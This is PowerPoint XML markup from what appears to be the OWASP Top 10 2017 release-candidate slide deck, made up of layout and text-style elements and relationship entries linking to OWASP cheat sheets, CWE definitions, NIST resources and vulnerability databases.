              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Title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49" r:id="rId5"/>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www.owasp.org/index.php/Password_Storage_Cheat_Sheet#Leverage_an_adaptive_one-way_function"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3.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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cynosureprime.blogspot.com.au/2017/08/320-million-hashes-exposed.html" TargetMode="Externa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Password_Storage_Cheat_Sheet"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 Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords"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Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/projects/cryptographic-module-validation-program/validated-modules/search" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/202.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt"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s://en.wikipedia.org/wiki/Billion_laughs_attack"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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.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en.wikipedia.org/wiki/Document_type_definition" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing"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blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html"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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.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ASVS"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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.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s://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/fina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owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project"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Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00200308_clientsidetemplateinjection" TargetMode="Externa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DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection"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s://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html"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github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.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502.html"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Heartbleed" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/08/465k-patients-need-a-firmware-update-to-prevent-serious-pacemaker-hacks/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices"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github.com/retirejs/retire.js/"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s://cve.mitre.org/"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 TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/"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cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;"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Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter"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WebGoat" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education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Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project"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OWASP_Node_js_Goat_Projec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OWASP/Top10/issues" TargetMode="Externa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9.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notesSlide" Target="../notesSlides/notesSlide21.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007"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hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall"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hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submission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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.0/"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owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5"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owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS"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s://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="Externa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slide" Target="slide23.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168"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owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Command_Injection_Defense_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7.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Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00101080_serversidetemplateinjection"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www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Inj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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4267200"/>
            <a:ext cx="6858000" cy="41148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sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6858000" cy="42672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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3201130"/>
            <a:ext cx="5562600" cy="538609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Golden Master (golden-master, post RC2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:ln w="24500" cmpd="dbl">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                  <a:miter lim="800000"/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Comments requested per instructions within</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="OWASP_logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="381000"/>
            <a:ext cx="3260464" cy="9988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094000" y="8532000"/>
            <a:ext cx="1081144" cy="257976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
